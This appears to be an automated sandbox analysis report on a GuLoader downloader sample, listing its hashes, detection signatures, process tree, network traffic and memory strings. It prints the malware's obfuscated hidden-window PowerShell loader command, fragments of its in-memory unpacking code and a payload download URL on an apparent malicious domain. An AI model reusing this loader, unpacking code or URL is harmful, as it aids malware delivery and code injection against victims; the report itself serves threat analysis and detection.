Edit tour

Windows Analysis Report
3lH2EWD4wU.exe

Overview

General Information

Sample name:	3lH2EWD4wU.exe renamed because original name is a hash value
Original sample name:	2f9c0ba283506d8333e4f59b29fbeba3.exe
Analysis ID:	1544504
MD5:	2f9c0ba283506d8333e4f59b29fbeba3
SHA1:	23bc0a40b6690dab55d797e9c35cd82d796b85b1
SHA256:	979268f75b22895faa5d5b6b39442c8caa36d325edea3faf7c3d7a81d09041b0
Tags:	32exenjrattrojan
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

3lH2EWD4wU.exe (PID: 2264 cmdline: "C:\Users\user\Desktop\3lH2EWD4wU.exe" MD5: 2F9C0BA283506D8333E4F59B29FBEBA3)

powershell.exe (PID: 6688 cmdline: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 4488 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.3447816394.0000000007D74000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6688, TargetFilename: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) ", CommandLine: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3lH2EWD4wU.exe", ParentImage: C:\Users\user\Desktop\3lH2EWD4wU.exe, ParentProcessId: 2264, ParentProcessName: 3lH2EWD4wU.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) ", ProcessId: 6688, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Source: 3lH2EWD4wU.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: 3lH2EWD4wU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3lH2EWD4wU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_004062A3 FindFirstFileA,FindClose,	0_2_004062A3
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405768
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: unknown

DNS traffic detected: query: www.bookinginfo.asia replaycode: Name error (3)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: www.bookinginfo.asia

Source: 3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/.asia:443)
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/:P
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/R
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/Win64;
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/dP
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/mP
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/n
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3464521069.0000000023AD0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin)
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin1
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin;
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.binJ
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bineYQ
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.binv
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin~Y
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/rP
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/www.bookinginfo.asia
Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bookinginfo.asia/www.bookinginfo.asia5

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

Code function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405205

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe

Jump to dropped file

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

Code function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040320C

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_00404A44	0_2_00404A44
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_00406F54	0_2_00406F54
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_0040677D	0_2_0040677D

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe 979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0

Source: 3lH2EWD4wU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/13@12/0

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

0_2_0040320C

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

Code function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004044D1

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

Code function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,

0_2_004020D1

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

File created: C:\Users\user\AppData\Roaming\mobiliseredes

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

File created: C:\Users\user\AppData\Local\Temp\nsuC9B8.tmp

Jump to behavior

Source: 3lH2EWD4wU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3lH2EWD4wU.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

File read: C:\Users\user\Desktop\3lH2EWD4wU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3lH2EWD4wU.exe "C:\Users\user\Desktop\3lH2EWD4wU.exe"
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 3lH2EWD4wU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000008.00000002.3447816394.0000000007D74000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pox $trinodal $Fyresedlers48), (Kejsertiders @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:haandten = [AppDomain]::CurrentDomain.GetAssemblies()$global:P
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Oversttergenerators)), $Slagskygges).DefineDynamicModule($Carpid11, $false).DefineType($Windshake, $Neurologists, [System.MulticastDel

Suspicious powershell command line found

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
